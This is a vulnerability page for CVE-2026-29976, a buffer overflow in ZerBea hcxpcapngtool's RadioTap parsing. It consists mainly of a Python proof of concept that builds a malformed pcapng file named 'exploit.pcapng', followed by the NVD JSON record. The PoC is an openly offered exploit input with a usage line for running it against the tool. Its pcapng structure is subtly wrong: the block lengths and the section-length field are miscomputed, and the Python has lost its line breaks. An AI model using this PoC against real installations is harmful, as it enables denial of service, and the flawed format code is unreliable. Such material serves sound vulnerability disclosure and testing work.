CVE-2026-29976

import struct # Simplified PoC to generate a malformed pcapng file that might trigger the buffer overflow # This creates a minimal pcapng structure with a crafted RadioTap header. def generate_malformed_pcapng(filename): with open(filename, 'wb') as f: # Section Header Block (SHB) shb = b'\x0A\x0D\x0D\x0A' # Block Type shb += struct.pack('<I', 28) # Block Total Length shb += b'\x1A\x2B\x3C\x4D' # Byte Order Magic shb += struct.pack('<H', 1) # Version Major shb += struct.pack('<H', 0) # Version Minor shb += struct.pack('<I', 0xFFFFFFFF) # Section Length (unspecified) shb += struct.pack('<I', 28) # Block Total Length (again) # Interface Description Block (IDB) idb = struct.pack('<I', 1) # Block Type: IDB idb += struct.pack('<I', 20) # Block Total Length idb += struct.pack('<H', 1) # LinkType: Ethernet idb += struct.pack('<H', 0) # Reserved idb += struct.pack('<I', 0) # SnapLen idb += struct.pack('<I', 20) # Block Total Length (again) # Enhanced Packet Block (EPB) with malformed RadioTap epb = struct.pack('<I', 6) # Block Type: EPB # Packet Data: Minimal RadioTap header + malformed length # RadioTap header: Version (0), Pad (0), Length (0xFFFF - invalid large length) # Potential trigger for buffer overflow in getradiotapfield() malformed_radiotap = b'\x00\x00\xFF\xFF' + b'A' * 100 packet_len = 20 + len(malformed_radiotap) epb += struct.pack('<I', packet_len) # Block Total Length epb += struct.pack('<I', 0) # Interface ID epb += struct.pack('<I', 0xFFFFFFFF) # Timestamp High epb += struct.pack('<I', 0xFFFFFFFF) # Timestamp Low epb += struct.pack('<I', len(malformed_radiotap)) # Captured Len epb += struct.pack('<I', len(malformed_radiotap)) # Packet Len epb += malformed_radiotap epb += struct.pack('<I', packet_len) # Block Total Length (again) f.write(shb + idb + epb) print(f"[+] Malformed pcapng file generated: {filename}") print("[+] Usage: ./hcxpcapngtool -o output.pcap " + filename) if __name__ == "__main__": generate_malformed_pcapng('exploit.pcapng')

{"cve": {"id": "CVE-2026-29976", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:36.137", "lastModified": "2026-04-02T19:37:58.263", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Overflow vulnerability in ZerBea hcxpcapngtool v. 7.0.1-43-g2ee308e allows a local attacker to obtain sensitive information via the getradiotapfield() function"}, {"lang": "es", "value": "Vulnerabilidad de desbordamiento de búfer en ZerBea hcxpcapngtool v. 7.0.1-43-g2ee308e permite a un atacante local obtener información sensible a través de la función getradiotapfield()"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zerbea:hcxtools:7.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "AA1414B9-89D6-48FB-890E-F8C4A5985AA8"}]}]}], "references": [{"url": "https://github.com/ZerBea/hcxtools/issues/365", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}